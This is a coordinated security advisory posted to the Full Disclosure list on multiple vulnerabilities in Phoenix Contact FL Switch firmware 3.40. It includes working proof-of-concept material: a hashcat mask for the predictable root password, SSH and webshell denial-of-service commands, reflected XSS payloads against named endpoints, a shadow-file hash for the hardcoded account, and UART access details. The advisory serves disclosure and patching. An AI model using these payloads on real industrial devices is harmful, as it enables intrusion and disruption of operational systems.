| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <PAXP190MB1647C0B1C4090CC0866E8112FEABA@PAXP190MB1647.EURP190.PROD.OUTLOOK.COM>
Date: Wed, 17 Dec 2025 14:11:32 +0000
From: Thomas Weber | CyberDanube via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CyberDanube Security Research 20251215-0 | Multiple
Vulnerabilities in Phoenix Contact FL Switch Series
CyberDanube Security Research 20251215-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| FL Switch
vulnerable version| 3.40
fixed version| TODO
CVE number| CVE-2025-41692, CVE-2025-41693, CVE-2025-41694,
| CVE-2025-41695, CVE-2025-41696, CVE-2025-41697,
| CVE-2025-41745, CVE-2025-41746, CVE-2025-41747,
| CVE-2025-41748, CVE-2025-41749, CVE-2025-41750,
| CVE-2025-41751, CVE-2025-41752
impact| High
homepage| https://www.phoenixcontact.com/
found| 16.04.2025
by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
| CyberDanube Security Research
| Vienna | St. Pölten
| This research was conducted in cooperation with Verbund
| OT Cyber Security Lab during a penetration test.
|
| https://www.cyberdanube.com
|
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.
We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."
Source: https://www.phoenixcontact.com/en-us/company
Vulnerable versions
-------------------------------------------------------------------------------
Tested on FL SWITCH 2306-2SFP PN version 3.40
Find more information about affected products on the VDE Cert website:
https://certvde.com/de/advisories/VDE-2025-071
Vulnerability overview
-------------------------------------------------------------------------------
1) Weak/Predictable root Password (CVE-2025-41692)
The device's root password is generated with weak a weak ruleset. An attacker
with access to the administration password can bruteforce it in seconds. The
"password" part of the password is equal to the password set in the web
interface.
2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The device is vulenrable to a denial of service condition when ssh is enabled.
An authenticated attacker can exploit this issue to make the device unresponsive
3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
The webshell is vulnerable to a denial of service condition. An authenticated
attacker can exploit this issue to make the webserver unresponsive.
4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695,
CVE-2025-41745 - CVE-2025-41752)
Multiple GET and POST requests can be used to trigger reflected cross-site
scripting vulnerabilities. This can be used to execute malicious code in the
context of a user’s browser. Cookies may be also stoled via this way.
5) Hardcoded User Password (CVE-2025-41696)
The device's "user" account has weak hardcoded credentials. An attacker with
physical access could abuse this to gain serial access.
6) Access to UART Console (CVE-2025-41697)
The device exposes a UART console on the PCB, which allows an attacker to
interact with the Linux operating system. Based on vulnerability 5), an
attacker can login with hardcoded credentials to the system. This attack
requires physical access.
Proof of Concept
-------------------------------------------------------------------------------
1) Weak/Predictable root Password (CVE-2025-41692)
The root password is generated using the mask "<pw>\*[0-9][8]". The following
hashcat configuration can be used to calculate the password if administration
credentials are known.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
hashcat -m 500 -a 3 hash.txt password*?d?d?d?d?d?d?d?d --force
$1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1:password*92016123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1
Time.Started.....: Mon Apr 14 13:25:20 2025, (3 secs)
Time.Estimated...: Mon Apr 14 13:25:23 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: password*?d?d?d?d?d?d?d?d [17]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 121.3 kH/s (59.56ms) @ Accel:4 Loops:250 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 399360/100000000 (0.40%)
Rejected.........: 0/399360 (0.00%)
Restore.Point....: 368640/100000000 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: password*13636123 -> password*62273232
Hardware.Mon.#1..: Temp: 69c Util:100% Core: 210MHz Mem: 405MHz Bus:16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A possible password would be "SuperStrongPassword*92016123". It is generated
from the combination of the web interface password (SuperStrongPassword) and
the appended asterisk plus the eight digit number. The password is newly
generated on each new start of the device.
-------------------------------------------------------------------------------
2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The dropbear is modified by the manufacturer. When using the ssh feature to
execute commands directly after login, the process stays open and uses resources.
After ~6 connections the device becomes unresponsive.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
attacker$ ssh <known_user>@<IP> echo DOS
switch$ top
Mem: 62024K used, 62996K free, 0K shrd, 0K buff, 21576K cached
CPU: 13% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Mem: 63016K used, 62004K free, 0K shrd, 0K buff, 21576K cached
CPU: 12% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Load average: 6.97 3.47 1.44 7/190 1393
PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
1163 1162 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1246 1244 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1294 1293 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1233 1232 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1255 1254 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1385 1384 root R 6892 6% 0 14% /usr/bin/pxc_cli -ssh
1121 1093 apache S 24752 20% 0 7% /usr/bin/php -c /dev/shm/php.ini
842 1 root S 877m 718% 0 6% /usr/bin/pxc_mona -o
-------------------------------------------------------------------------------
3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
When the webshell receives an empty command with a whitespace, the server
blocks until it receives more data, resulting in an dos condition.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ curl "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ curl -vv "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
* Trying 192.168.19.143:80...
* Connected to 192.168.19.143 (192.168.19.143) port 80
> GET /php/command.php?usr=admin&pwd=password&cmd=%20 HTTP/1.1
> Host: 192.168.19.143
> User-Agent: curl/8.5.0
> Accept: */*
>
-------------------------------------------------------------------------------
4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695,
CVE-2025-41745 - CVE-2025-41752)
The reflected cross-site scripting vulnerabilities can be triggered by using
the following POST requests.
Dyn Conn Example (CVE-2025-41695):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/dyn_conn.php HTTP/1.1
Host: 192.168.19.143
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
objSave=%3Cscript%3Ealert(document%2elocation)%3C/script%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Port Cntr Example (CVE-2025-41745):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_portCntr2.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
btn_clear=1&activeTab=1"></script><script>alert(document.location)</script><script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Port Sec Example (CVE-2025-41746):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_portSecCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vlan Intf Example (CVE-2025-41747):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_vlanIntfCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
btn_apply=1&activeInf=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GET Requests for triggering XSS:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(CVE-2025-41748)
http://192.168.19.143/php/pxc_Dot1xCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41749)
http://192.168.19.143/php/port_util.php?portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41750)
http://192.168.19.143/php/pxc_PortCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41751)
http://192.168.19.143/php/pxc_portCntr.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41752)
http://192.168.19.143/php/pxc_portSfp.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
5) Hardcoded User Password (CVE-2025-41696)
The shadow file shows the hardcoded credential of "user". The hash corresponds
to the password "user".
-------------------------------------------------------------------------------
$ cat /etc/shadow
[...]
mailman:!!:11851:0:99999:7:::
mysql:!!:11851:0:99999:7:::
ldap:!!:11851:0:99999:7:::
pvm:!!:11851:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
-------------------------------------------------------------------------------
6) Access to UART Console (CVE-2025-41697)
Two vias next to the "LC125A Quadruple Bus Buffer Gate" on a edge of the PCB
are exposing the RxD and TxD UART pins.
These pins can be intefaced with a UART-to-USB converter via its RxD and TxD
pins. The needed settings are 38400 Baud, 1n8 at 3.3 Volt.
Solution
-------------------------------------------------------------------------------
Update to the latest available firmware (3.50 and newer).
Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.
Recommendation
-------------------------------------------------------------------------------
Apply patches immediately.
Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the
shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all
affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-10-14: Coordinated publication of security advisory.
2025-11-18: Phone call with Phoenix Contact; shifted publishing date to
2025-12-09 due to discussions with CERT@VDE regading risk rating.
2025-12-09: Received CVE numbers for XSS vulnerabilities from Phoenix Contact.
2025-12-15: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF T.Weber / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists